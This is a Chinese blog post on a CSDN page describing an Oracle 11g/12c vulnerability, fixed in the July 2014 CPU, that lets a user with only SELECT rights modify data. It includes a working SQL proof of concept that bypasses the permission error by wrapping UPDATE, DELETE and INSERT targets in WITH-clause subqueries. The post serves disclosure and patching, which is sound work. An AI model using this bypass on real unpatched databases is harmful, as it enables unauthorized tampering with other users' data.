【ORACLE】Oracle11g,12c 高危漏洞

最新推荐文章于 2023-03-17 11:26:26 发布
最新推荐文章于 2023-03-17 11:26:26 发布
阅读量1.4k 收藏
点赞数
分类专栏: ORACLE troubleshoot 文章标签: oracle oracle 11g 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AskTommorow/article/details/59482739
版权 
【性质】高危漏洞
【危害】仅有查询权限的用户可以对数据进行增、删、改操作
【影响范围】广泛,包括11.2.0.3,11.2.0.4,12.1等版本(10g版本不包含)。
【修复】2014年7月的CPU中被修正,强烈建议您检查所有Oracle数据库,确认是否存在该安全风险。

与此有关的CVE号包括:CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .

相关信息还可以参考Oracle的CPU页面:
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

【bug test】
--100.95  Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit
SQL> conn ncv502/ncv502
create user test identified by test;
grant create session to test;
create table t (ID number(4)); 
insert into t(ID) values(1); 
select * from t;
grant select on t to test;

SQL> conn test/test
select * from ncv502.t;
update ncv502.t set id = 1 where id = 1;
              *
第 1 行出现错误:
ORA-01031: 权限不足

--在WITH语句中,权限限制被完全绕过,增删改权限被获得
SQL> update (with tmp as (select id from ncv502.t) select id from tmp) set id = 0 where id = 1;
1 row updated.
SQL> commit;
Commit complete.
SQL> delete (with temp as (select * from ncv502.t) select id from temp) where id = 0;
1 row deleted.
SQL> insert into (with temp as (select * from ncv502.t) select * from temp) select 2 from dual;
1 row created.

drop table t purge ;
drop user test cascade;

--71 Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit  没有该bug
AskTOMmorow
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跪求oracle漏洞补丁包
kcen-cai
10-30 1万+
各位大侠,你们好    实在无奈,在此请求各位有 oracle客服服务号的朋友帮忙下载下面补丁,感谢!可以用云盘的方式分享给我,感谢 Oracle数据库Network Foundation组件远程拒绝服务漏洞 1        Oracle Database "CTXSYS.DRVDISP"本地权限提升漏洞 1        Oracle Database Server远程Co
Oracle 11gR2高危权限安全漏洞解决
ciqu9915的博客
05-27 1162
IT运行维护中,系统升级补丁是不可缺少的工作。无论是何种系统或者软件,都存在出现Bug和故障的可能。同时,系统不断升级、推出新特性功能,都会给系统现有平衡状态带来新漏洞出现的机会。此外,在各种因素的驱动作用...
Oracle 11g 漏洞补丁包 p13390677_112040_Linux-x86-64下载
06-09
java文件中为 百度网盘地址 包含三个压缩包: p13390677_112040_Linux-x86-64_1of7.zip p13390677_112040_Linux-x86-64_2of7.zip p13390677_112040_Linux-x86-64_3of7.zip , 相关下载链接:https://download.csdn.net/download/weixin_47395433/85591652
oracle数据库警告,Oracle数据库高危漏洞警告!
weixin_32111725的博客
04-13 567
最近在互联网上暴露出一个Oracle高危漏洞,利用该漏洞,仅有查询权限的用户可以对数据进行增、删、改操作,非常危险。该漏洞影各位用户,最近在互联网上暴露出一个Oracle高危漏洞,利用该漏洞,仅有查询权限的用户可以对数据进行增、删、改操作,非常危险。该漏洞影响范围非常广泛,包括在国内最常见的11.2.0.3,11.2.0.4,12.1等版本。该漏洞在2014年7月的CPU中被修正,但是如果用户...
Oracle 11.2.0.4 TNS 监听器远程中毒漏洞(CVE-2012-1675)修复方案
热门推荐
09-05 2万+
Oracle 11.2.0.4 单实例修复方案 随着对网络安全的进一步重视,Oracle TNS 监听器远程中毒漏洞(CVE-2012-1675)被列为了高危漏洞,需要进行漏洞修复。 从Oracle 11.2.0.4开始,Oracle 引入了Valid Node Checking For Registration(VNCR)新特性,可以通过配置参数VALID_NODE_CHECKING_REGIS...
漏洞公告】Oracle WebLogic Server 11g / 12c核心组件漏洞的说明以及详细修复方案(原创)...
weixin_30739595的博客
07-17 1245
- 本文目录 - 1. 补丁集修复漏洞说明 1.1 Oracle WebLogic 10.3.6.0.190716 1.2 Oracle WebLogic 12.1.3.0.190716 1.3 Oracle WebLogic 12.2.1.3.190522 2. WLS 内核组件漏洞说明 3. 漏洞修复方案 3.1 WebLogic 10.3.6....
Weblogic12c T3 协议安全漏洞分析【CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645】
weixin_45694388的博客
10-02 2046
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555、 CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
Oracle的一些安全加固配置
bobo now~
12-11 618
Oracle的一些安全加固配置
【Unified Auditing】Oracle 12c 统一审计基础介绍
SQLplusDB的小院
10-24 3347
Oracle 12c 统一审计(Unified Auditing)的概要介绍
oracle 11g12c的ojdbc驱动
02-21
包含oracle 11g12c的ojdbc驱动: Oracle Database 12c Release 2 (12.2.0.1) drivers Oracle Database 12c Release 1 (12.1.0.2) drivers Oracle Database 12c Release 1 (12.1.0.1) drivers Oracle Database ...
oracle11g12c下载
08-09
Oracle 11g12cOracle公司推出的两个不同版本的关系型数据库管理系统。这两个版本在功能、性能和架构上都有各自的特点,适用于不同的应用场景。 Oracle 11g(第11代)是Oracle数据库的一个重要里程碑,它首次...
oracle 12c 11g下载地址.txt
05-29
oracle 11g12c在官网已经不支持下载,该文档是oracle 11g12c及其他老版本的真实官网下载地址。亲测有效。
Oracle单实例版本升级(11g To 12c).docx
07-10
Oracle 单实例版本升级(11g12c) 在本篇文章中,我们将详细介绍 Oracle 单实例版本升级从 11g12c 的过程。这个过程包括数据库升级准备工作、升级步骤和测试计划等几个方面。 数据库升级准备工作 在开始...
Oracle数据库安全加固记录
gyh3534的博客
03-17 968
一个应用系统做等保,需要对数据库进行安全加固,根据流程需要先在测试环境进行测试通过后应用于生产环境,这里简单记录测试过程,审计内容是评测的重要点,但是生产环境也不便于开启,这里先简单记录之,后面再进行相关内容补充。LOCKED(TIMED): 这种状态表示失败的login次数超过了FAILED_LOGIN_ATTEMPTS,被系统自动锁定,需要注意的是,在Oracle 10g中,默认的DEFAULT值是10次.说明: 如果不使用EM,可以停用MGMT_VIEW,DBSNMP,SYSMAN帐号.
oracle11g远程命令执行漏洞,「漏洞通告」WebLogic多个远程代码执行漏洞
weixin_42519170的博客
04-03 607
一、漏洞概述京时间4月15日,Oracle官方发布了2020年4月关键补丁更新公告CPU(Critical Patch Update),修复了397个不同程度的漏洞。其中包括三个针对Weblogic的严重漏洞(CVE-2020-2801、CVE-2020-2883、CVE-2020-2884)和一个OracleCoherence远程代码执行漏洞(CVE-2020-2915),使用了Oracle...
oracle11g远程命令执行漏洞,Weblogic CVE-2018-3191远程代码命令执行漏洞复现
weixin_39679468的博客
04-03 441
0x00 简介北京时间10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。0x01 漏洞复现目标weblogc...
Oracle12C-针对log4j漏洞补丁修复
Alone的博客
12-27 1462
一、查看设备Opatch版本 注意事项: 停止所有服务 存放Patch到目录Oracle\Middleware\Oracle_home\Opatch 切换目录 修改环境变量加入Oracle家目录 cd C:\Oracle\Middleware\Oracle_Home\OPatch #切换路径 opatch version 注:若版本低于13.9.4.2.5则需要先升级Opatch 升级Opatch版本 使用p28186730_139425_Generic(6880880) 升.
ogg12c oracle11g
最新发布
10-26
OGG 12cOracle 11g 是两个不同的 Oracle 数据库产品。 OGG 12cOracle GoldenGate 的一个版本,它是一种实时数据复制和数据集成软件,可以用于将数据从一个数据库复制到另一个数据库,包括不同的平台和不同的数据库版本。OGG 12c 具有高性能、低延迟和可靠的数据复制能力,可以广泛应用于实时数据分析、数据仓库、数据备份等场景。 而 Oracle 11gOracle 公司推出的一款关系数据库管理系统 (RDBMS),它是 Oracle 数据库产品系列的一个版本。Oracle 11g 提供了全面的数据库管理和数据处理功能,包括事务管理、并发控制、数据安全性等。它还提供了许多高级功能,如分布式数据库、数据复制、高可用性等。Oracle 11g 是一个成熟稳定的数据库产品,在企业级应用系统中得到广泛应用。 总结来说,OGG 12c 是一款实时数据复制和数据集成软件,可以实现不同数据库之间的数据复制和数据传输,具有高性能和可靠性;而 Oracle 11g 是一款功能强大的关系数据库管理系统,具有全面的数据库管理和数据处理功能。两者虽然都属于 Oracle 数据库产品系列,但在功能和应用场景上有着不同的定位和用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值